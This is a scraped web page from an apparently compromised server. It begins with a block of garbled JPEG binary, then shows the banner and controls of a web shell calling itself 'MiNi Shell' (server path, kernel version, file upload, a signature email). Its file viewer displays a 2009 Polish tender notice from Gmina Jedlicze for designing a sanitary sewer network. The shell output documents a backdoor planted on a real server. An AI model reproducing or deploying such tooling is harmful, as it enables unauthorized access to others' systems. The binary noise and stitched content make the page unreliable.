JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090903/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090903/146291-N-2009.html

<p class="kh_header"><b>Jedlicze: Opracowanie dokumentacji budowlanej i wykonawczej na budowę kanalizacji sanitarnej dla m. Chlebna z uwzględnieniem ulic Wierzbowej, Zielonej oraz Manierskiego w m. Jedlicze</b><br>
<b>Numer ogłoszenia: 146291 - 2009; data zamieszczenia: 03.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Jedlicze , Rynek 6, 38-460 Jedlicze, woj. podkarpackie, tel. 013 4352207, faks 013 4352025.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jedlicze.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji budowlanej i wykonawczej na budowę kanalizacji sanitarnej dla m. Chlebna z uwzględnieniem ulic Wierzbowej, Zielonej oraz Manierskiego w m. Jedlicze.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> . Przedmiotem zamówienia jest opracowanie kompletnej dokumentacji projektowej (budowlanej i wykonawczej) sieci kanalizacji  sanitarnej w miejscowości Chlebna  oraz dla ulic Wierzbowej, Zielonej i Manierskiego w miejscowości Jedlicze wraz z przyłączami.

Długość kolektorów w miejscowości Chlebna  około  4000m, ilość przyłączy około  120 budynków.
Długość kolektorów w miejscowości Jedlicze około 3000m w tym ul. Zielona ok. 420 m i ul. Wierzbowa ok. 800 m (ul. Wierzbowa i Zielona nie ujęte w koncepcji kanalizacji sanitarnej Gminy Jedlicze) ilość przyłączy dla miejscowości Jedlicze około  91 budynków.

 UWAGA: dokumentację projektową należy opracować zgodnie z aktualną koncepcją kanalizacji sanitarnej Gminy Jedlicze. Dokumentacja powinna obejmować kolektor B, który łączy się z istniejąca kanalizacją. 

3. Realizacja przedmiotu zamówienia określonego w ust 3.1 SIWZ polegać będzie m. in. na obowiązku Wykonawcy wykonania  i przekazania Zamawiającemu: projektu budowlano-wykonawczego na budowę sieci kanalizacji sanitarnej z przyłączami w miejscowości Chlebna oraz dla ulic Wierzbowej, Zielonej oraz Manierskiego w m. Jedlicze w 4 egz., z tym że:
a) przedmiar robót sieci głównej i rozdzielczej, przedmiar robót przyłączy domowych, kosztorysy inwestorskie, specyfikację techniczną wykonania i odbioru robót, informację bezpieczeństwa i ochrony zdrowia - po 2 egz;
b) prawomocne pozwolenie na budowę - 1 egz;
c) cała dokumentacja wraz z załącznikami w wersji elektronicznej na CD w formacie PDF - 1 egz;
d) kompletny projekt budowlany musi być opracowany wg obowiązujących przepisów, umożliwiający kompleksową realizację inwestycji, zawierających m.in. komplet niezbędnych opinii i uzgodnień oraz decyzji, umowy cywilno-prawne, umożliwiające uzyskanie pozwolenia na budowę zgodnie z wymogami rozporządzenia Ministra Spraw Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego,(DZ.U. Nr 202, poz. 2072); 
e) projekt budowlany winien posiadać komplet opinii i uzgodnień wynikających z decyzji o lokalizacji inwestycji celu publicznego oraz przepisów, norm, kolizji z istniejącym uzbrojeniem terenu, (siecią energetyczną, gazową, teletechniczną, drenarską i wodociągową), a także winien być zaopatrzony w wykaz opracowań i pisemne oświadczenie projektanta, że jest wykonany zgodnie z umową, obowiązującymi przepisami techniczno-budowlanymi oraz normami, i że został wydany w stanie kompletnym ze względu na cel oznaczony umowy;
f) szczegółowe przedmiary robót z podziałem na branże i obiekty - opracowania zawierające opis robót budowlanych w kolejności technologicznej ich wykonania, z podaniem ilości jednostek przedmiarowych robót wynikających z dokumentacji projektowej oraz podstaw do ustalania cen jednostkowych robót lub nakładów rzeczowych. Należy opracować przedmiary w rozbiciu na sieć główną wraz z siecią rozdzielczą oraz na przyłącza domowe;
g) wykonania wszelkich projektów technicznych, które są konieczne do prowadzenia robót przygotowawczych związanych z realizacją inwestycji a w szczególności wykonanie projektów niezbędnych przekładek lub przebudów instalacji dla obiektów kolidujących z inwestycją;
h)wykonanie innych nie wymienionych powyżej prac związanych z projektowaniem a niezbędnych dla prawidłowego wykonania inwestycji, odbioru i uzyskania decyzji o pozwoleniu na użytkowanie jeżeli będzie wymagane;
i) wykonania w ramach wynagrodzenia wszelkich prac niezbędnych do zrealizowania prac projektowych przedmiotowej inwestycji, również tych , których konieczność ujawni się w trakcie realizacji inwestycji;
j) zbiorcze zestawienie kosztów i kosztorys inwestorski dla wszystkich robót z podziałem na branże i obiekty, opracowany zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (DZ. U. Nr 130 poz. 1389). Należy opracować kosztorysy inwestorskie w rozbiciu na sieć główną wraz z siecią rozdzielczą oraz na przyłącza domowe;
k) wszelkie niezbędne dokumenty potrzebne do uzyskania pozwoleń na budowę, oraz zagospodarowania terenu.
4. Dokumenty należy wykonać zgodnie z wytycznymi zawartymi w Rozporządzeniu Ministra  Infrastruktury z dnia 02 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz. U. z 2004 r. Nr 202, poz. 2072 ze zm.,) Rozporządzeniem ministra gospodarki przestrzennej i budownictwa z dnia 1 października 1993 r. w sprawie bezpieczeństwa i higieny pracy w oczyszczalniach ścieków (Dz. U. Nr 96, poz.438), Rozporządzeniem Ministra Infrastruktury z dnia 23 czerwca 2003r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz. U. z 2003r. Nr 120, poz. 1126), Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. z 2004r. Nr 130 poz. 1389). Zamawiający zastrzega, by informacje zawarte w dokumentacji w zakresie technologii wykonania robót, doboru materiałów i urządzeń określały przedmiot zamówienia w sposób zgodny z ustawą  z dnia 29 stycznia 2004r. - Prawo zamówień publicznych (t.j. Dz.U. z 2007r., Nr 223, poz. 1655 z późn. zm.) tzn. bez używania nazw własnych, a jedynie poprzez określenie parametrów precyzujących rodzaj, standard oraz inne istotne elementy.
5. Wykonawca w celu wykonania przedmiotu zamówienia jest zobowiązany ponadto do:
a) uzyskania w niezbędnym zakresie i na swój koszt - badań, opinii, uzgodnień, innych projektów (w miarę wystąpienia takiej potrzeby np. sieci i przyłączy elektroenergetycznych) i wszelkich pozwoleń wymaganych odrębnymi przepisami (m.in. uzgodnień z zarządcami dróg, właścicielami lub zarządcami infrastruktury podziemnej m.in. melioracyjnej, uzyskanie: decyzji środowiskowej itp.);
b) za wyjątkiem opłat przyłączeniowych, które umożliwią uzyskanie decyzji pozwolenia na budowę (lub inną decyzję wymaganą przepisami, która pozwoli Zamawiającemu rozpocząć realizację robót budowlanych na podstawie dokumentacji stanowiącej przedmiot niniejszego zamówienia); UWAGA: wszelkie pisma do instytucji innych urzędów należy przesyłać do wiadomości Zamawiającego, 
c) uzyskania od właścicieli nieruchomości oświadczenia o zgodzie na przebieg rurociągów przez ich posesje oraz lokalizacji przepompowni (zgoda ma być wyrażona na fragmencie kserokopii mapy przedmiotowej inwestycji, przedstawiającym daną nieruchomość oraz przebieg zarówno sieci, jak i przyłącza przez daną nieruchomość), treść zgody na wejście w teren należy uzgodnić z Zamawiającym. Oświadczenie o którym mowa powyżej stanowi wymóg zgody na wejście w teren w rozumieniu art.47 ustawy prawo budowlane; 
d) uzyskania map sytuacyjno-wysokościowych do celów opiniodawczych;
e) uzyskania mapy wraz z aktualizacją podkładów geodezyjnych sytuacyjno-wysokościowych dla celów projektowych w niezbędnym zakresie;
f) uzyskania aktualnych wyrysów z mapy ewidencji gruntów oraz wypisów z rejestrów gruntów do decyzji o ustaleniu lokalizacji inwestycji celu publicznego i pozwolenia na budowę, oraz decyzji środowiskowej;
g) uzyskania kompletnych materiałów do decyzji o ustaleniu lokalizacji inwestycji celu publicznego; 
h) uzyskania warunków technicznych zasilania energetycznego, przejścia pod drogami, rowami, ciekami wodnymi i innymi przeszkodami terenowymi, niezbędne do kompletu dokumentacji;
i) kompletny wniosek (z niezbędnymi załącznikami) do wydania decyzji o środowiskowych uwarunkowaniach inwestycji, raport oddziaływania na środowisko wymagany prawem polskim - o ile jest wymagany;
j) operat wodno-prawny w niezbędnym zakresie wraz z uzyskaniem pozwolenia wodno-prawnego, (jeśli wymagane);
k) składania pisemnych sprawozdań z postępów prac projektowych do 15 dnia każdego miesiąca licząc od dnia podpisania umowy: 
- w sprawozdaniu należy w szczególności uwzględnić: postęp prac projektowych, ewentualne zagrożenia terminu wykonania umowy, przedłużające się procedury uzgodnień i ich ewentualne powody, ewentualne uzgodnienia z właścicielami nieruchomości, na których projektowane są urządzenia kanalizacji sanitarnej; 
l) przedstawienia koncepcji rozwiązań projektowych do akceptacji Zamawiającego z uwzględnieniem przebiegu sieci kanalizacji sanitarnej, przepompowni i wszystkich innych niezbędnych urządzeń, a zwłaszcza ilości i lokalizacji przyłączy (zaakceptowana przez Zamawiającego koncepcja powinna jednoznacznie określać zakres prac projektowych; późniejsze zmiany w zakresie projektu będą możliwe tylko po uzyskaniu pisemnej akceptacji Zamawiającego); Zamawiający zobowiązuje się, w terminie do 21 dni od dnia jej otrzymania, do weryfikacji koncepcji, a po usunięciu ewentualnych wad do akceptacji jej w terminie do 7 dni od dnia otrzymania poprawionej koncepcji; 
ł) zapewnienia wszelkich innych usług własnych i obcych niezbędnych do prawidłowej realizacji przedmiotu zamówienia; 
m) po uzyskaniu wszystkich uzgodnień z właścicielami nieruchomości Wykonawca złoży:
 - oryginały zgód, o których mowa w ust. 3.5 c) SIWZ, 
 - mapy sytuacyjno - wysokościowe, które wchodzą w skład projektów budowlanych, o których mowa w ust. 3.5 d)  
    SIWZ,
 - wypełnione druki oświadczeń o dysponowaniu gruntem na cele budowlane -  (osobno dla działek, których właściciele wyrazili zgodę i osobno dla działek stanowiących własność Gminy),    - zestawienie działek w formie pisemnej i w formie elektronicznej (arkusz EXCel) - (osobno dla działek na których zaprojektowano sieć i osobno dla działek na których zaprojektowano przyłącza), 
n) po uzyskaniu wszystkich uzgodnień, a przed złożeniem wniosku o wydanie pozwolenia na budowę (lub innej decyzji wymaganej przepisami, która pozwoli Zamawiającemu rozpocząć realizację robót budowlanych na podstawie dokumentacji stanowiącej przedmiot niniejszego zamówienia), Wykonawca odbędzie co najmniej 2 spotkania w ramach konsultacji społecznych; 
o) po uzyskaniu wszystkich uzgodnień, a przed złożeniem wniosku o wydanie pozwolenia na budowę (lub innej decyzji wymaganej przepisami, która pozwoli Zamawiającemu rozpocząć realizację robót budowlanych na podstawie dokumentacji stanowiącej przedmiot niniejszego zamówienia)Wykonawca: 
- wytyczy geodezyjnie w terenie przebieg sieci kanalizacyjnej, studni kanalizacyjnych, przepompowni, przyłączy kanalizacyjnych, oraz innych urządzeń koniecznych do wykonania kanalizacji sanitarnej,
 - wezwie Zamawiającego do wizji w terenie, która winna się odbyć w terminie do 5 dni roboczych od wezwania, na jej podstawie zostanie sporządzony protokół wizji w terenie, (który stanowił będzie załącznik do protokołu przekazania dokumentacji), 
- przedstawi kompletną dokumentację projektową, która stanowi przedmiot niniejszego zamówienia, do akceptacji Zamawiającego ;
W razie braków w dokumentacji projektowej powodujących ich niezgodność z przepisami powszechnie obowiązującymi, Zamawiający odmówi przyjęcia dokumentacji wyznaczając wykonawcy termin do usunięcia niezgodności.
p) uzyskanie w imieniu Zamawiającego decyzji - pozwolenia na budowę (lub innej decyzji wymaganej przepisami, która pozwoli Zamawiającemu rozpocząć realizację robót budowlanych na podstawie dokumentacji stanowiącej przedmiot niniejszego zamówienia);
r) dostarczenie Zamawiającemu wykazu opracowań wraz z oświadczeniem o kompletności dokumentacji stanowiącej przedmiot zamówienia z punktu widzenia celu, któremu ma ona służyć, oraz jej zgodności z umową, obowiązującymi przepisami techniczno-budowlanymi, normami, zasadami wiedzy technicznej oraz przepisami prawa;
6.  Wykonawca zobowiązuje się do uzgodnienia z Zamawiającym treści wyjaśnień szczegółowych zagadnień niezbędnych dla uruchomienia procedur udzielania zamówień publicznych na podstawie przekazanego przedmiotu umowy, nie później jednak niż do momentu rozstrzygnięcia przetargu w powyższym przedmiocie.
7. Zamawiający informuje, iż Wykonawca otrzyma pełnomocnictwo do występowania w jego imieniu w sprawach związanych z realizacją przedmiotu zamówienia.
8. Przy wykonywaniu przedmiotowej dokumentacji wykonawca winien zapoznać się ze Studium programowo-przestrzennym zabezpieczenia przed powodzią terenów położonych w dolinie rzeki Chlebianki gm. Jedlicze woj. podkarpackie znajdującym się w Urzędzie Gminy Jedlicze, oraz zapewnić zgodność przedmiotowej dokumentacji z założeniami w/w studium..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.35.15.00-8, 71.32.22.00-3, 71.35.40.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy: 
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia tj.
a) wykonali w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, co najmniej 1 usługę, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadającą swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających należyte i terminowe wykonanie usług.
 Za usługę odpowiadającą swoim rodzajem usługom stanowiącym przedmiot zamówienia Zamawiający rozumie: wykonanie dokumentacji projektowej sieci kanalizacji sanitarnej o długości minimum 7 km.
b) posiadają uprawnienia projektowe w następujących specjalnościach (tj. decyzja nadająca wymagane uprawnienia projektowe oraz aktualne zaświadczenie o przynależności do właściwej Izby Inżynierów Budownictwa): a) instalacyjnej w zakresie sieci i instalacji sanitarnych lub tożsamych w zakresie zamówienia - bez ograniczeń b) instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub tożsamych w zakresie zamówienia, wydanych na podstawie wcześniej obowiązujących przepisów. 
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego.

Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia 
Nie spełnienie chociażby jednego warunku, skutkować będzie wykluczeniem wykonawcy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełnienia warunków udziału w postępowaniu wykonawcy składają w formie oryginału lub kserokopii  poświadczonej za zgodność z oryginałem przez wykonawcę następujące dokumenty:
1. W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, zamawiający żąda następujących dokumentów:
a) aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
b) aktualnych zaświadczeń właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
Uwaga!
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia do oferty należy dołączyć wymagane w punkcie VI.1 SIWZ dokumenty dotyczące wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia. 
2. W celu potwierdzenia warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, zamawiający żąda następujących dokumentów:
a) wykazu wykonanych w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 1 usługi odpowiadającej swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia. 
Za usługę odpowiadającą swoim rodzajem usługom stanowiącym przedmiot zamówienia Zamawiający rozumie: wykonanie dokumentacji projektowej sieci kanalizacji sanitarnej o długości minimum 7 km 
Wykaz powinien zawierać: krótki opis przedmiotu zamówienia, datę wykonania, wskazanie odbiorców, wartość wykonanej usługi (netto lub brutto) Do wykazu należy dołączyć dokumenty potwierdzające, że roboty te zostały wykonane należycie.
Wartość robót wyrażona w innej walucie niż polska zawarta w wykazie przedłożonym przez Wykonawcę przeliczona zostanie wg. kursu NBP z dnia ogłoszenia przetargu.
b) Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia wraz z załączeniem  dokumentacji potwierdzającej posiadanie uprawnień projektowych w następujących specjalnościach (tj. decyzja nadająca wymagane uprawnienia projektowe oraz aktualne zaświadczenie o przynależności do właściwej Izby Inżynierów Budownictwa): a) instalacyjnej w zakresie sieci i instalacji sanitarnych lub tożsamych w zakresie zamówienia - bez ograniczeń b) instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub tożsamych w zakresie zamówienia, wydanych na podstawie wcześniej obowiązujących przepisów. 
c) pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia jeżeli w wykazie, o którym mowa w pkt. b), wykonawca wskazał osoby, którymi będzie dysponował (w przypadku, gdy te osoby będą udostępnione przez inne podmioty niż wykonawca składający ofertę) wraz z dokumentami, o których mowa w pkt b)
3. Oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu i niepodleganiu wykluczeniu z postępowania (załącznik nr 1 do SIWZ).
4. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w:
a) pkt. VI.1.a,b SIWZ - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a. nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b. nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
Dokumenty, o których mowa w pkt VI.4.a).a, SIWZ powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w pkt VI.4.a).b SIWZ, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. VI.4.a) zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://jedlicze.bip.krosoft.pl/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Jedlicze, ul. Rynek 6, 38-460 Jedlicze, pokój nr 7.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.09.2009 godzina 10:00, miejsce: Urząd Gminy Jedlicze, ul. Rynek 6, 38-460 Jedlicze, pokój nr 1 (sekretariat)..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com